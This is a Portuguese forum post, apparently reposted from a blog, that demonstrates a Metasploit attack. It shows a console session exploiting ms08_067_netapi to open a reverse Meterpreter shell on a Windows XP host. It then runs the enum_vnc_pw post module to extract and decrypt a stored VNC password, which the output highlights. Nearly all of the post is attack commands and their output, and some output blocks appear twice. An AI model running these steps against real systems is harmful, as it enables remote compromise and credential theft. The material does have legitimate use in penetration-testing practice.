MSF Meterpreter: Quebrando senhas do VNC
Recentemente Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... escreveu sobre o Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar..., está feature do payload Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... quebra o algoritmo DES de senhas do *VNC.
Rob Fuller aka mubix reescreveu o módulo adicionando várias funcionalidades e melhorias, como ele ainda não está integrado ao MSF poderá ser baixado Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Vamos aos testes
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 11.11.11.11:4444[*] Automatically detecting the target…[*] Fingerprint: Windows XP – Service Pack 3 – lang:Portuguese – Brazilian[*] Selected Target: Windows XP SP3 Portuguese – Brazilian (NX)[*] Attempting to trigger the vulnerability…[*] Sending stage (749056 bytes) to 11.11.11.11[*] Meterpreter session 2 opened (11.11.11.12:4444 -> 11.11.11.11:1032) at Mon Mar 21 15:57:38 -0300 2011
[*] Started reverse handler on 11.11.11.11:4444[*] Automatically detecting the target…[*] Fingerprint: Windows XP – Service Pack 3 – lang:Portuguese – Brazilian[*] Selected Target: Windows XP SP3 Portuguese – Brazilian (NX)[*] Attempting to trigger the vulnerability…[*] Sending stage (749056 bytes) to 11.11.11.11[*] Meterpreter session 2 opened (11.11.11.12:4444 -> 11.11.11.11:1032) at Mon Mar 21 15:57:38 -0300 2011
meterpreter > background
msf exploit(ms08_067_netapi) > use post/windows/gather/enum_vnc_pw
msf post(enum_vnc_pw) > set SESSION 1
SESSION => 1
SESSION => 1
msf post(enum_vnc_pw) > run
[*] Enumerating VNC passwords on VITIMA[*] Checking UltraVNC…[*] Checking WinVNC3_HKLM…[*] Checking WinVNC3_HKCU…[*] Checking WinVNC3_HKLM_Default…[*] Checking WinVNC3_HKCU_Default…[*] Checking WinVNC_HKLM_Default…[*] Checking WinVNC_HKCU_Default…[*] Checking WinVNC4_HKLM…
[+] WinVNC4_HKLM => 2101f4d191cf99ca => DcLabsgays on port: <== OLHE A SENHA AQUI ;-P[*] Checking WinVNC4_HKCU...[*] Checking RealVNC_HKLM...[*] Checking RealVNC_HKCU...[*] Checking TightVNC_HKLM...[*] Checking TightVNC_HKLM_Control_pass...[*] Post module execution completed
msf post(enum_vnc_pw) >
[*] Enumerating VNC passwords on VITIMA[*] Checking UltraVNC…[*] Checking WinVNC3_HKLM…[*] Checking WinVNC3_HKCU…[*] Checking WinVNC3_HKLM_Default…[*] Checking WinVNC3_HKCU_Default…[*] Checking WinVNC_HKLM_Default…[*] Checking WinVNC_HKCU_Default…[*] Checking WinVNC4_HKLM…
[+] WinVNC4_HKLM => 2101f4d191cf99ca => DcLabsgays on port: <== OLHE A SENHA AQUI ;-P[*] Checking WinVNC4_HKCU...[*] Checking RealVNC_HKLM...[*] Checking RealVNC_HKCU...[*] Checking TightVNC_HKLM...[*] Checking TightVNC_HKLM_Control_pass...[*] Post module execution completed
msf post(enum_vnc_pw) >
Fonte: Alexos
Comment